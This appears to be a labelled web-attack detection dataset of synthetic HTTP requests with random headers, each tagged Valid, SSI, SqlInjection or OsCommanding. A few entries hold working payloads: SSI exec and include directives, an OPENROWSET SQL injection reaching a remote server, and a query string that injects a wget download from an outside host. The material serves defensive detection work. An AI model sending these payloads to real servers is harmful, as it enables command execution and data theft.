Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Fri, 03 Mar 06 10:34:33 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: Cltc
From: cnbutmc@typvDt.cz
If-Modified-Since: Mon, 05 May 08 07:37:59 GMT
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: *
If-None-Match: *
If-Range: "MeCafWHvG_bmrQit"
Max-Forwards: 07
MIME-Version: 6.2
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Digest opaque="reseriT"
Range: -1702
Referer: /nr9rbnhg/t6bv/nLri6lo.asmx
TE: trailers,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 2.7; us-Hn; rv:6.1.0) Gecko/22928237
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 413x0589
Via: HTTP/3.7 175.103.86.250
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 835 www.aifJnm.js "9hedstplseeoacoe" "Thu, 13 May 04 16:51:39 CET"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49747
Start - Id: 32880
class: Valid
PUT /Tdld/4TnET7lib/2fZPzYFm@@s2KZHF/ehA/oGk0/bo/fAS38OhF4kq1N2DEV/likeRyexeccYrmRllnJup/Dk1/1fLLo.exe? HTTP/1.1
Content-Length: 58
Content-Language: e,chr,eeS
Content-Encoding: deflate
Content-Location: /piapr.rar
Content-MD5: eG83ZWRhZWlnbmNzZ25SbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 May 08 13:44:07 CET
Last-Modified: Sun, 07 Jan 07 18:26:58 CET
Host: 136.6.7.6
Connection: efeth
Accept: application/*;q=0.9, audio/*;q=0.3, text/xml;q=0.6
Accept-Charset: shift_jis;q=0.0, euc-cn;q=0.2, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: 8tissr-tjpd, mIrenc-Rfi
Cache-Control: no-store
Client-ip: 12.98.135.178
Cookie: etsfr7pd6iobh=234;zgchttpbf=lndHthie;8e76UKkNupdate=422;RidtP=81341471;pgnranoaee9iox3=5576;mWhrMsnh7=teq8ia6connectntU
Cookie2: $Version="0"
Date: Fri, 06 Nov 09 15:15:49 UTC
ETag: W/"8t8fHELcaANTpDotCBf"
Expect: 100-continue
From: heae@rytmtosHp.biz
If-Modified-Since: Sun, 07 Mar 10 07:25:34 CET
If-Unmodified-Since: Sun, 15 Feb 04 08:20:59 UTC
If-Match: "wML_qTTCRKejqsgZ"
If-None-Match: "cwOPxQtHrsq27EyZ430"
If-Range: *
Max-Forwards: 851
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b2lnbkFocnRJcDhuZWRlN0F0ZWNPZWlvZ3hZcmlzaUppdGg=
Authorization: Digest username="r4etzye"
Range: 963-,-5,7530-974609
Referer: http://Nrcoyx.be/raLnup/eacc5ens.shtml
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/2.1 (compatible; MSIE 9.7; Windows NT; tcmnes9; cetdMNhP; iralj)
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: 2.9 www.Etro.css:7006
Transfer-Encoding: tdrona; et5tat=rubee
Upgrade: 2eiteo/5.5, vaOkr/7.8, oUsl/6.5
Warning: 161 240.196.121.132 "mopaMtwmhecnqn" "Sun, 13 Feb 05 12:52:19 GMT"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bk11Lhbtnxkito=m@&2cidirwe=wFxo6&Ckb88amo=andp&eerwbtl=8

End - Id: 32880
Start - Id: 22209
class: Valid
GET /ax-JPc/n43d/ashleSdesf/WxAtanVconnect4_T/GooharghaapSalbs/sIpH_/PhtpassetciaKpeH/wMKaseNOvkbCi.jpg?evex3aouoehia=31037310 HTTP/1.1
Host: 190.57.8.97
Connection: tsnoEpwn
Accept: video/mpeg;q=0.6, audio/x-wav, text/*;q=0.1
Accept-Charset: koi8-r, iso-2022-kr, iso-8859-9;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 65.73.209.151
Cookie: obH9ihomeP=98;.fOYallC1lsJ=iiormo;o1=625407255
Cookie2: $Version="1"
Date: Wed, 22 Jun 05 22:14:59 UTC
ETag: "8lIP4UFX.Gq_zdTG"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Mon, 21 Jun 04 10:06:49 UTC
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: "UVl.G0aeTYEsYPOD6Xjw"
If-None-Match: "QK@vS5pEyaSj4p1"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.8
Pragma: aoaoatej=ir
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: http://OwmeVeNx.it/ihlq.js
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 0.9; xr-od; rv:9.7.3) Gecko/39673257
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: HTTP/8.7 66.165.27.187:78, FTP/4.6 53.235.149.16
Transfer-Encoding: atIlo
Upgrade: tmok/9.0, unq6a/6.8, to6le/2.7
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22209
Start - Id: 11857
class: Valid
GET /hWka4tB3YOmEGUQ/69andZHUaHj/o9rYwS/goaEnz/egca.asp?ttt9ectd=rosrmgsrehnnokz&re=eh+svdaorperw&jtwtDe9aeagne=2&samdsElsieywe=tdeMhtfo&nzE=miueuabesot9ibyre&see=8doEmd%24Rmho&yIdme=lanf&07ariy6luth=ji HTTP/1.1
Host: www.derXaencd.gov
Connection: ewsoklhm
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eoowhbn-e, pbeI-hDntsi;q=0.3, oew-aAe87, siai-7, dtlu-uebtmese
Cache-Control: max-age=4
Client-ip: 122.253.207.72
Cookie: it=OPanmdholwaAn;xeossd3ohwwods=exec;Kfj4S=1i+;sdstvxOnes6a=haI;moi2uoidyjie=377
Cookie2: $Version="31"
Date: Fri, 28 Aug 09 10:46:06 GMT
ETag: W/"67kL@DZF4aceJz5dVI"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Wed, 22 Sep 04 05:58:23 GMT
If-Unmodified-Since: Mon, 11 Jul 05 21:45:30 CET
If-Match: *
If-None-Match: "kQPmJXw-vFD5ZkDXGzm"
If-Range: Tue, 01 Feb 05 02:21:41 CET
Max-Forwards: 431
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: hnLol ueohtIwr=wHldEo
Authorization: Basic cmE3YUs6ZUxocA==
Range: -5,8-9019,5352-463
Referer: /aaps.png
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.3 (compatible; Konqueror/1.2; Win 9x; mna8udugsf; r7ed4shl)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8397x1098
Via: 8.0 www.RZjjbiit.html, u5iiyj/2.6 230.111.82.25, 4.0 162.145.208.236
Transfer-Encoding: deflate
Upgrade: rrn/5.2, rJrm/9.4, str/0.7
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 3151909596780283547
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11857
Start - Id: 20068
class: Valid
GET /ispaolncrceM4A3oeh/ateari9iaeCtjtsuin.msf?strntumtE=k&HaHK1vlike74whttp=zgt%3En&eogaeoe4id=ehaitrcp%2Fz%2Fjwtses%3E5i&7yDXMt.@Iy=tokDAaW93b&iktseon=08564895&thGWrcpKO=8 HTTP/1.0
Host: www.cgesh.fr:21
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: compress
Accept-Language: t-rp, Igxintee-o2q;q=0.0, 0aHdsetl-bptpatz
Cache-Control: no-cache
Client-ip: 180.96.17.0
Cookie: 1uc=hb1h;htnhhnebq=i8JJp@OvFy;UsIsr=767295;CxG0c9qn.D=reot;RcRl=velsddaotbfie
Cookie2: $Version="462"
Date: Mon, 18 Jan 10 11:31:21 UTC
ETag: "3Rkugc0BF15ZHyL@Zdo"
Expect: Tawhh
From: lnAp2pl@vGteni.biz
If-Modified-Since: Wed, 25 Jul 07 01:03:54 CET
If-Unmodified-Since: Sat, 22 Mar 08 21:18:06 GMT
If-Match: "RS1usDqLbnuIdOKSmnj"
If-None-Match: "86PnE21@58rQu4LM"
If-Range: Sun, 30 Oct 05 22:20:28 GMT
Max-Forwards: 8659
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.soar.ch/Mnti/etre/jSi8/hgnp/dst9a.tar.gz
Authorization: Basic eWZ0dDphZ3VkZ29F
Range: -09642
Referer: /rdee7ii/zuyeetdb/ohai.tiff
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 3.3; si-ih; rv:5.8.0) Gecko/14780356
UA-CPU: PowerPC
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1108x908
Via: 0.7 228.151.3.113
Transfer-Encoding: identity
Upgrade: edl/6.4, oivt/9.3, uhe/8.8, vst/2.0
Warning: 803 www.EtWa.png "vdirr8neztcn" 
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 9909201039312
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20068
Start - Id: 39928
class: SSI
PUT /h2UpC9qeq.php4? HTTP/1.1
Content-Length: 292
Content-Language: rhD7e,winyIhla
Content-Encoding: gzip
Content-Location: http://eiYsls.ch/b5ar.png
Content-MD5: Y3BuY29udDNpNXJ5dVplZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Dec 04 24:22:32 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: 188.108.167.44
Connection: keep-alive
Accept: video/*, text/*, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.1, gzip;q=0.8, identity, compress
Accept-Language: it3-d62;q=0.8, ttyumuai-dY4A, uxvf-wahsfOe;q=0.7
Cache-Control: no-cache
Client-ip: 101.181.0.245
Cookie: .H_0Kwindow.openIT=251;hM2ireeebe=t+v/nsT(bdivlehnS6;ahnwceoEpctoiy=oxVrX;documentqkrE_3HAU=te ymhavingdr
Cookie2: $Version="36"
Date: Wed, 03 Aug 05 04:48:49 GMT
ETag: W/"3ax_BKlx3_dpxaTqEp"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Fri, 21 Oct 05 10:43:43 CET
If-Unmodified-Since: Mon, 08 Mar 04 18:24:56 GMT
If-Match: *
If-None-Match: *
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: vse5 LnTu5icu=otlnt
Authorization: Digest username="eseT3sEl"
Range: 065804-4,-22740,4181-
Referer: /nysdrS/ltTo/eaRi/FsnEE.exe
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Match
User-Agent: Mozilla/2.9 (X11; U; Linux i386 2.7; fd-9l; rv:1.9.0) Gecko/17015989
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: identity
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hafntt=usre(&1PGa6@O=n&usrTH7E=oo&r0nScr=6731&tIephreetg=ui3hz6twE&dK6m1UX-g=<!--  #exec     cmd="/bin/ls    -l    /home/l9iulrna4/ce"  -->&ylq9gdArheenKe=q:rcpr38&sae=00702&Dwr=taaz9&scgtweDsevztubt=masng&oformc2dr&moaekt6AaTrp=mv&nRJsmSUCFk=5IvszvFj&fwe=002394

End - Id: 39928
Start - Id: 39845
class: SSI
PUT /mutos3ebmneot0aol/lpGY1gk/tetseoRUteice/lahaewt8/ixcq/rsh9nhham8lscp/b8/_bgroup byGt/tlgWlrH0vG8/mtoTcit1leot7ynoq/9rF@kUcopya@p4LIhttps@/ly9isz4YrDx6SDW8g.asmx? HTTP/1.0
Content-Length: 293
Content-Language: lBatQ,itoc6seh
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 14:31:48 GMT
Host: www.hAfo2.cz
Connection: fglVragh
Accept: */*;q=0.7
Accept-Charset: windows-1255;q=0.0
Accept-Encoding: <!--    #include    virtual="/var/log/httpd/access.log"     -->
Accept-Language: *
Cache-Control: max-age=36685
Cookie: hytGeiiea9je=41846669;WUSOFe=updateishh;EQ58OPD..oP4=tots89siiHl3stsoa;ehepd=f44hlSstri;RhfNL1linkGsock_stream5=ay@0
Date: Mon, 02 Apr 07 05:27:40 GMT
From: isoiw8r9@OOdoa.org
If-Modified-Since: Fri, 13 May 05 17:23:06 CET
If-Unmodified-Since: Mon, 14 Jul 08 02:22:47 CET
If-None-Match: *
Max-Forwards: 86
MIME-Version: 9.1
Pragma: dr=t5r1n
Authorization: Digest nc=6E1DE4BA
Referer: http://www.eidg5.biz/lOtliT/eumzej/0inthip/yisadtd/6iJcn5.jpeg
User-Agent: 3beec/9.0.5.0
Via: omdt/4.0 180.151.99.209, FTP/6.9 237.246.134.170
X-Forwarded-For: 244.252.217.204

3sueoiem=a0eoptch&HlrcilO=dnqro2eitlSOachsbt&t8pehcihsjoenef=A&2daypoecvoftbl=ml3&vgthMhe=zoe75tteqT8&eto9Uccs34lZm1b=ikUYoVht&gm6dtf=6107869003&helmtoeTt1eNt=$5elocation'eiwp-O(<\7s)cen&Eb=iMJ153&ttsNIrtooWa5tm=9301613&7lik3eogerpsn=19018&o8ren1dornrgrn=r7w&rfe=905&yhyloo7b=75954

End - Id: 39845
Start - Id: 15150
class: Valid
GET /iPwB8/mehOuahhh/4KdlpL9C/sb@25drSWTdQhsn/rdocumentjA.betweenr/nptm4Bsud/oCdilh-_EL/0sire/re0yoi/G5uaInlog6S/9p.T.2nbWnVT1uonoh.jpeg? HTTP/1.1
Host: www.cntEaael.cz
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, iso-2022-jp, iso-8859-6
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 33.217.250.167
Cookie: 0biioetph=n-r@1Nq5I_
Cookie2: $Version="501"
Date: Sun, 23 Apr 06 11:20:20 UTC
ETag: "0uLjov9Nslyl1Um57Gg"
Expect: thS2ch
From: fbsohcou@fT8svas.cz
If-Modified-Since: Fri, 08 Jun 07 15:22:17 GMT
If-Unmodified-Since: Mon, 12 Oct 09 12:20:25 GMT
If-Match: "nHlCTQRm7y-4@uzkVjRz"
If-None-Match: *
If-Range: Wed, 03 Dec 08 20:08:09 GMT
Max-Forwards: 9
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: Basic cmxjYWZlbDpudHBiZW4=
Range: -96,366774-,-767
Referer: /kp5e/Dhbsn/cebcvoi/wtts.js
TE: gzip,trailers,chunked
Trailer: Host
User-Agent: oeITdtweypmtOettap
UA-CPU: 68000
UA-Disp: 1668,172,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4259x4108
Via: FTP/7.9 220.223.136.176:2563, HTTP/7.7 54.187.7.106
Transfer-Encoding: identity
Upgrade: k0e/8.3, ee0yu1/6.5, csixbf/0.4
Warning: 455 www.dehnos.js "etweeiry" "Thu, 30 Jul 09 01:53:06 GMT"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 28006910
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15150
Start - Id: 27372
class: Valid
GET /mten6onwecbpmesi.htm? HTTP/1.1
Host: 213.90.90.6
Connection: llnih
Accept: video/*, image/jpeg, text/*
Accept-Charset: ks_c_5601-1987;q=0.3, euc-kr;q=0.8, utf-8;q=0.0, iso-8859-8;q=0.6, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9370
Client-ip: 131.181.78.228
Cookie: 848W2rxuMsQ=msy1oIeoielcnacmri;ad6mfynm=A|opt:t3le;opsRtcnlx1n=n6oagao0ahemar;atuDytqmeoons=8a6c;tsoMeibv9ta=j41
Cookie2: $Version="9"
Date: Sun, 16 Oct 05 21:43:04 UTC
ETag: "Le2MTLIN3sOpapYZvi"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Tue, 14 Aug 07 09:41:36 UTC
If-Match: *
If-None-Match: *
If-Range: "S_.OgbssaE_LUF9_Y"
Max-Forwards: 8022
MIME-Version: 6.5
Pragma: 4='rita'
Proxy-Authorization: MeYm toondn=clnamd
Authorization: NTLM ZWFib3ZJRXNuaGFidU9ZYTRlcmVPcmV2cm43am5BdG5OZjNlbXVpZWVsaA==
Range: 5279-
Referer: /arqeh.doc
TE: gzip
Trailer: Expect
User-Agent: 0Dtslorm
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9698x542
Via: HTTP/7.9 207.250.52.14
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 365 216.84.39.69 "lisohq8cHaNasanTe" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27372
Start - Id: 2977
class: Valid
GET /aIVaset/pPQm7v/lEyP/Joa/gccOm-vteQ8Z_.t8y/edqty.html?NeAY7ZziD8e=aU7fciPEq&R8objectJuYC=4yono&wt=tCCiokHN&lcdoPtTuoN6t=poCxon&ij8phqnraeosoe=245044&rtIi7bohcHoL=o8_XHT9&eb=0 HTTP/1.1
Host: www.8IOooao.de
Connection: close
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 233.41.255.68
Cookie: n76tu= ;e2tenrmT4ewcEWz=mhh;rt3e=?de;mwatrlct40=1
Cookie2: $Version="1"
Date: Sat, 19 Mar 05 10:58:19 UTC
ETag: "j.ORBjhBmL3vcAWa"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 19 Nov 08 10:07:08 CET
If-Unmodified-Since: Mon, 22 Jan 07 20:35:13 UTC
If-Match: "XAzPpcVAMfk4LFO2UJd_"
If-None-Match: "p5UW8rEDDKojLNA"
If-Range: *
Max-Forwards: 075
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: iof1dc hrbtir=tksa
Range: 941701-436,57-,44-
Referer: http://s1aeas.gov/ceoxfarb/hehy0d.php
TE: trailers
Trailer: Proxy-Authorization
User-Agent: eboKd6 http://www.aoei7.gov
UA-CPU: StrongARM
UA-Disp: 5870,274,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4979x0191
Via: HTTP/2.1 www.thesec.gif, aHPva/3.5 53.245.104.248
Transfer-Encoding: deflate
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2977
Start - Id: 16327
class: Valid
GET /tVPvEpi/2eoqe/mao0nanacsOewsiebt/zse9etfalho/tisUu/shapaaiod.pl?d4nenhsncd=66172893&Lna8=2188216&srn7esoneeq=871598&jPk3=faenlwSwot%3AMlts&6uey70l=cqy&RBek=kwneTnhy&eiuyanpuwj2=6hEpaBtn3n%28we&uoe=76 HTTP/1.1
Host: www.tcniwil.com
Connection: keep-alive
Accept: video/quicktime, application/*, application/x-tar
Accept-Charset: cp-932
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-stale=3759
Client-ip: 76.128.152.96
Cookie: eebdgiR2EaoEtua=33607675;t6bt=honruiuwoemexecnm;nrc=936813
Cookie2: $Version="463"
Date: Fri, 20 Jul 07 03:09:39 UTC
ETag: "OIq2z55.cn@ja3WSe625"
Expect: haNbe=rreu
From: fewlhd@mrbErs.biz
If-Modified-Since: Sat, 02 Jun 07 11:09:17 CET
If-Unmodified-Since: Sat, 04 Dec 04 16:57:05 UTC
If-Match: *
If-None-Match: "IK2caHMmnCDa..BChUk"
If-Range: *
Max-Forwards: 10
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: Basic cVB4MG9ubjpzNHRhb3Jz
Range: -652120,9-,091-
Referer: http://yygie.com/yhmssmro/wiettln/2fEu/inrl/d4lrnen.nsf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (Windows; U; Win98 3.4; zc-mq; rv:0.5.0) Gecko/61163377
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: compress
Upgrade: weawp/7.1
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16327
Start - Id: 42758
class: SqlInjection
PUT /eNszEEKWE-K7eLj/p76ycVYwDo_PkVszAG/t./20g5sam5havingX/iQaa6aeEieunqjcoernf/M2xp_copyperlx/x0ohw0eTeaed.exe? HTTP/1.0
Content-Length: 223
Content-Language: ehea,hnced5gs
Content-Encoding: gzip
Content-Location: /Hlecoef0/ln3d.php
Content-MD5: bzB1Z2hoaWxFN2EydFU0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 17:55:22 CET
Last-Modified: Thu, 29 May 08 10:10:57 CET
Host: 221.94.236.199
Connection: kiec
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity, identity;q=0.8, compress;q=0.1, compress
Accept-Language: *
Cache-Control: max-age=06262
Client-ip: 45.188.16.45
Cookie: ypn2gsiraa=bgsound5r;eatEhssTnp9o=eV0vTHL-;k6hts6t4=;   insert  into  OPENROWSET('SQLoledb','uid=zu7hnisz;pwd=xH1Nrgyaa;Network=DBMSSOCN;Address=157.223.97.254,1433;','select     * from _sysdatabases'  );    select    *   from   LinkedOrRemoteSrv1.master.dbo.sysdatabases
Cookie2: $Version="823"
Date: Tue, 20 Nov 07 10:51:27 UTC
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Sun, 29 Apr 07 22:13:21 CET
If-Unmodified-Since: Thu, 29 Dec 05 23:09:38 GMT
If-Match: "B.ucT3luCH2H-J8"
If-None-Match: "8nj34qnX0kDO.64Wb6uW"
If-Range: Mon, 01 May 06 05:02:23 UTC
Max-Forwards: 2
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM Y2lvaW1lMUVha2Eyb3h3bnRvbWFsZTdleGR5aHIwdG92cg==
Authorization: Digest realm
Referer: http://saosijc.net/eolciams/eteee.css
TE: gzip,gzip;q=0.0
Trailer: Host
User-Agent: nDursceJlT
UA-CPU: Sparc
UA-Disp: 2042,3575,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 885x378
Via: 7.7 236.184.233.25:9709, 9.1 www.estctkod.gif, ndDOby/5.9 208.33.216.162:1
Transfer-Encoding: identity
Upgrade: eewl/6.7, eikn/3.1
Warning: 428 229.86.248.151 "4fbuiivernor" 
X-Forwarded-For: 21.115.124.16
----: --------------------

tnrihetdji=cowIalc+zp&ptiPnx=r0w&lrtGt5dOe=5&sai=7&ldcheIt=se&g&YVyhKYL=eSTboi&fspladnpr=wyEqMqVR.wcz&Erasng4ndneRoo=vArfaae&msssasrlAfert=hp5KQas50lbg&5u9AZlu6t=hkobteo7&fcwlcmsu=2325324912&at=8210169&macttuqioendp=iAK

End - Id: 42758
Start - Id: 43163
class: OsCommanding
GET /Trleyyifhetett/pgPGZ2/vsamfveRJvwhere3/sNvLmOzK6pJ3El/dT5ZvaUwL_v_0/2jr8raaa2oathaeainnn/TconnecteV6m/sh7xephqop/xeasaeu1lisdeTf/ieu0van7rf/0tseoh.png?mmh8diatct6ig=kps2d8Inedie&pslh3od=%22+%3B+++++%2Fusr%2Fbin%2Fwget+++www.rotianinla.com%2Fenasil+%3B&mdotRe=gapdoofpl8jteoaee&RsiribDa8sahNhh=hteet&ce=8MDr&isogelitt=+ymti&biniittxGeytme=4690&h0cee4csug=%28%5CemzNiframejaYtme%29etmis&prbp=ic HTTP/1.1
Host: www.api2.biz
Connection: hdtfbq3
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 231.103.210.133
Cookie: bng9onasaisSt1=9;z9-X.Yswcg.=7
Cookie2: $Version="8"
Date: Sun, 03 Jun 07 19:48:52 CET
ETag: "2HaIWcgvC5CU6XU"
Expect: rraIb=hh0aw
From: Thwz@uroeopi4.net
If-Modified-Since: Sat, 25 Sep 04 01:53:52 CET
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "@-6lEwOkAx4vQSf-"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.7
Pragma: e6d3abio='msrWlna'
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: http://si5dia.biz/1te8f8.php4
TE: deflate,chunked;q=0.9,chunked
Trailer: If-Match
User-Agent: eZdqfc http://www.n4n7eaph.gov
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 953x846
Via: 8.1 www.lneuE.css
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43163
Start - Id: 27610
class: Valid
GET /0mvpYLxmERQR7oLL2F.p/yegqee/km4Yhtb_07Pejfa8/NakI/rluspwtontNI/ji/amm8kuV/dAmdhdey8mnN69.jpeg?kCnqAw3hxinbrj=343&pei=63397&E4co=hsnw+rwutturamy&oinlefresraej=%26Ee&pweaasnrryni=h&07ay=iuisr%3Asyst%24&aqewjl7oen75=67&ialocationdivlike1SS=dKsCHr&lmni=01030&alaseiyn=httpse%28group+byeTpdseo41e&XcobjectVPT=ut&ngitskua52tj=iv9-qwURMNS&ynahn=selecty HTTP/1.1
Host: 14.235.202.92:80
Connection: keep-alive
Accept: video/*;q=0.9, image/*;q=0.7
Accept-Charset: windows-1254;q=0.6, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=52
Client-ip: 70.6.137.206
Cookie: 5Hade=nIupdateg)[ste'w)<]ii7;meka=z/e=gsnodeoiayja4xei@) 
Cookie2: $Version="380"
Date: Mon, 20 Jun 05 09:53:32 GMT
ETag: W/"2JFkjBVhB8Pi_ph"
Expect: 100-continue
From: oieTnE@t0eayas.com
If-Modified-Since: Wed, 16 Apr 08 04:03:43 GMT
If-Unmodified-Since: Mon, 06 Jun 05 06:34:58 UTC
If-Match: "mrXR7Pqc-iYbOGY3"
If-None-Match: "u@EPOB2P7n1g5mi9"
If-Range: Sat, 27 Aug 05 20:32:19 CET
Max-Forwards: 2057
MIME-Version: 9.4
Pragma: tatromLw=ose
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Digest algorithm=MD5-sess
Range: -004669,-26019
Referer: http://loadce.gov/io1s.gif
TE: chunked;q=0.4
Trailer: Warning
User-Agent: z4ir5Tlk
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
